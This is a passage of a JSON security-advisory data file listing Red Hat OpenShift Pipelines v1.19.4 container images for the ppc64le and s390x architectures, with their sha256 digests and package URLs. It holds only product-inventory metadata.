"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-watcher-rhel9@sha256%3A05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830107"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-webhook-rhel9@sha256%3A5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830289"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-cache-rhel9@sha256%3A914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771720"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-chains-controller-rhel9@sha256%3A01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-git-init-rhel9@sha256%3A03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764942761"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-api-rhel9@sha256%3Addbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764818880"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-db-migration-rhel9@sha256%3A6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764819005"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-ui-rhel9@sha256%3Abf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764819019"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-controller-rhel9@sha256%3Adbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845239"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-entrypoint-rhel9@sha256%3A7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845346"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-events-rhel9@sha256%3A169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845294"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-nop-rhel9@sha256%3A64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845253"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-resolvers-rhel9@sha256%3A61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845383"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-sidecarlogresults-rhel9@sha256%3Aedba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845278"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-webhook-rhel9@sha256%3Aae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845382"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-workingdirinit-rhel9@sha256%3Aa41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pruner-controller-rhel9@sha256%3Ac7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764774996"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-api-rhel9@sha256%3A8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764775225"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-retention-policy-agent-rhel9@sha256%3A389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764775225"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-watcher-rhel9@sha256%3A13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764635259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-controller-rhel9@sha256%3Affbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769550"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-core-interceptors-rhel9@sha256%3Ac8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769552"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-eventlistenersink-rhel9@sha256%3Ac2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769677"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-webhook-rhel9@sha256%3A2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769674"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-console-plugin-rhel9@sha256%3Aa4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771718"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-manual-approval-gate-controller-rhel9@sha256%3Ac2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764777983"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-manual-approval-gate-webhook-rhel9@sha256%3A4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771736"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-cli-rhel9@sha256%3A63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830200"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-controller-rhel9@sha256%3A66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830290"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-watcher-rhel9@sha256%3A86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830107"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-webhook-rhel9@sha256%3A6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830289"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-cache-rhel9@sha256%3A3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771720"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-chains-controller-rhel9@sha256%3A5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
